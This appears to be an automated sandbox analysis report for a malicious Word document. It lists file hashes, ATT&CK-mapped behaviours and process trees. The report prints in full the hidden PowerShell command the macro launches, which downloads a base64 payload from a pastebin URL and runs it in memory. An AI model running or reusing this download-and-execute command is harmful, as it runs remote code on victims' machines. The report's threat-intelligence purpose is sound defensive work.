Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
24-07-2024 01:53
Behavioral task
behavioral1
Sample
5fe9554ff8c4a81a2a99ff2a12a6393c0cc1e89e6291751db310913431785077.doc
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
5fe9554ff8c4a81a2a99ff2a12a6393c0cc1e89e6291751db310913431785077.doc
Resource
win10v2004-20240709-en
General
-
Target
5fe9554ff8c4a81a2a99ff2a12a6393c0cc1e89e6291751db310913431785077.doc
-
Size
781KB
-
MD5
0949319f174a220b4e719715d9d5b20e
-
SHA1
cdebf579f8f30226872d0b5bbeaeaa81877fe9c8
-
SHA256
5fe9554ff8c4a81a2a99ff2a12a6393c0cc1e89e6291751db310913431785077
-
SHA512
9e5f5362ea147aa19ae6ebe74cbf037b2a295343f01cab5b1a44a076954abf3773d77e3fae26e0ebf488b1fde579e2178a75183b6a74a5acb669b4ed503d9632
-
SSDEEP
6144:rcnOY442OGwG1e3MenWfLds5Gn/RQQDPzuUC3uJXfr2opd91pV0mccMRdWIb8haR:rvCG1PenjQzi5Wyk/yJY0F
Malware Config
Extracted
https://pastebin.com/raw/pw1Ht9hR
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2552 2672 powershell.exe 29 -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2552 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2552 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 pastebin.com 3 pastebin.com -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2672 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2552 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2552 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2672 WINWORD.EXE 2672 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2672 wrote to memory of 2652 2672 WINWORD.EXE 30 PID 2672 wrote to memory of 2652 2672 WINWORD.EXE 30 PID 2672 wrote to memory of 2652 2672 WINWORD.EXE 30 PID 2672 wrote to memory of 2652 2672 WINWORD.EXE 30 PID 2672 wrote to memory of 2552 2672 WINWORD.EXE 31 PID 2672 wrote to memory of 2552 2672 WINWORD.EXE 31 PID 2672 wrote to memory of 2552 2672 WINWORD.EXE 31 PID 2672 wrote to memory of 2552 2672 WINWORD.EXE 31
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5fe9554ff8c4a81a2a99ff2a12a6393c0cc1e89e6291751db310913431785077.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/pw1Ht9hR'))).EntryPoint.Invoke($null,$null)2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
47KB
MD5f8c7ec6da57ae75490132ff35cef2247
SHA1962da8dd8ec8d636ebfeb3beecc296fa0b0e64f8
SHA256849fdaaab3c0ca296b2c06a1d7b2f0779a594a0b796023810eda1d7606af31cb
SHA512e44be74690c981f54b78765716abfb51e2f5108d034623bea9f5213dccd1b1342b9547370a09b7bf5a4f0c70c9d81c6d61d77e5fff6fe096e9313ba8b5a5d094
-
Filesize
19KB
MD577d94adf27b068f6c2dfda4bf418adfe
SHA1a4bde2ac570780ccf07108e04100c867e3610a18
SHA256018293a2d1a84a07b0828092c8ba29d547c07335edb39c145acbd5996d537a03
SHA512379eb5424690f579eeb23f6aa11956e8702677e620d48097e19d1d48ab61303bd43e601a38005c492821d6477d143f9310b193f0f4a9402bd28cd0005cb45c23
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84